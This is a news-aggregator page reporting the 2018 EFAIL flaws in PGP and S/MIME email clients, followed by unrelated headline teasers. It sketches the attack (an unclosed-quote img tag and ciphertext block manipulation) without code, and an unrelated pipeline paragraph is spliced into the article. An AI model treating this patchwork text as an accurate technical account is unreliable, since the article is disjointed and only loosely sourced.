Critical Flaw Found in PGP and S/MIME Email Clients Like Apple Mail

14 May, 2018, 20:42 | Author: Shawn Conner
  • В самом популярном способе шифрования нашли дыру

Security researchers have discovered two means of getting the decrypted information out of the message, and all they require is a copy of the encrypted message.

He said the vulnerabilities "might reveal the plaintext of encrypted emails, including encrypted emails sent in the past" and that there are no current fixes available. EFAIL basically strips those protections and lets attackers read encrypted messages regardless of who sent them, how long ago they were sent, or how they were initially compromised. ProtonMail itself has verified that it is not vulnerable to Efail. Furthermore, separate guides have been provided to disable PGP plugins in Thunderbird, Apple Mail, and Outlook.

A professor of computer science has warned users of Pretty Good Privacy (PGP) that the encryption program has vulnerabilities and should be immediately disabled. To prevent a breach, users need to secure access to their mailboxes and prevent their email clients from loading HTML code from external websites.

In their paper, researchers noted that "while it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext". According to the researchers, both CFB and CBC enable an attacker to reorder, remove or insert ciphertext blocks, or to perform meaningful plaintext modifications without the encryption key. Researchers are advising users to rely on end-to-end encrypted messaging apps instead, in the meantime.

Alberta premier confident pipeline talks will succeed by May 31 deadline
The $7.4-billion project would almost triple the flow of diluted bitumen and other products between Edmonton and Burnaby. The company has threatened to pull out of the project by then if B.C., Alberta and Ottawa can not come to an agreement.

The researchers indicate that updates are needed for OpenPGP and S/MIME to fully address the issue.

"In the most straightforward example of our attacks, the adversary prepares a plaintext email structure that contains an img element, whose URL is not closed with quotes", the researchers wrote.

They then would have to send the contents of that encrypted email back to its owner - the victim - in a carefully crafted way to make email clients think it's HTML.

The most serious vulnerabilities have resided in Thunderbird, macOS Mail, and Outlook for more than 10 years and remain unfixed at the moment, the researchers said. They do note, however, that disabling HTML rendering won't completely stop EFAIL attacks. "Disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking Efail". The importance of email encryption went mainstream after whistleblower Edward Snowden revealed the extent of the US government's electronic surveillance in 2013.

Recommended:



Popular

Iran's FM leaves Tehran for Beijing for talks on nuclear deal
The exacerbation of relations between Israel and Iran over Syria has sparked Moscow's concern, the Russian Foreign Ministry said. Zarif arrived in Beijing on Sunday for the first stop of his tour, ahead of visiting Moscow and Brussels in the coming days.

OnePlus 6 Mirror Black and Midnight Black variants leaked
The special edition Avengers Infinity War OnePlus 6 will also be launched alongside the standard variants in India. OnePlus 6: Iris Scanning Teased? The listing also says the OnePlus 6 will have Gorilla Glass 5 on both sides.

Man Utd boss Mourinho won't celebrate second
Those few minutes at the end take me to 500 club appearances, 200 of which have been for @ManUtd . How poor United's shots were show the underlying numbers, as their expected goals were just 0.60.

Ireland bowl in inaugural Test against Pakistan
Duly reprieved, he went to fifty in just 52 balls, including seven fours, with Shadab following him to the landmark in 89 balls. Rankin and Thompson removed Asad Shafiq and Sarfraz Ahmed respectively before Ashraf and Khan steered Pakistan to the close.

Moscow says it won't supply advanced air defenses to Syria
Asked about the fact that the Israeli attacks in Syria were serving Russia , Meghin replied: "It seems to be the case". The Kremlin says that Russian Federation and its ex-Soviet allies will sign a free trade pact with Iran .

Spanish Grand Prix: Hamilton grabs pole, team-mate Bottas is second fastest
Nico Hulkenberg was the fastest driver to be eliminated in Q1 and will start in 16th place tomorrow. The two Red Bulls of Max Verstappen and Daniel Ricciardo were fifth and sixth.

Leinster 15 - 12 Racing 92: Irish hold nerve to win Euro cup
He was enormous in their semi-final win over Munster, making 20 tackles and constantly slowing down ball. Racing 92 - runners-up two seasons ago - are looking to claim their first title in the club's history.

Shooting reported at California high school, sheriff says
A shooting at the school, she said, has "actually been one of my biggest fears". "I never knew it would happen to us here". The parents recently transferred the boy from Highland High School though it was unclear why.

Bank of England keeps rates unchanged
On Friday the currency rose 0.1 percent versus the dollar at $1.3533 and increased 0.1 percent against the euro at 88.090 pence. Higher interest rates exert downward pressure on inflation, and lower interest rates push it up.

World Health Organization hopes to deploy vaccine after fresh Ebola outbreak in DR Congo
Despite the remote location, one worrying sign is that the outbreak involves three separate locations that cover about 37 miles. A new experimental vaccine has been shown to be highly effective against the virus, though quantities are now limited.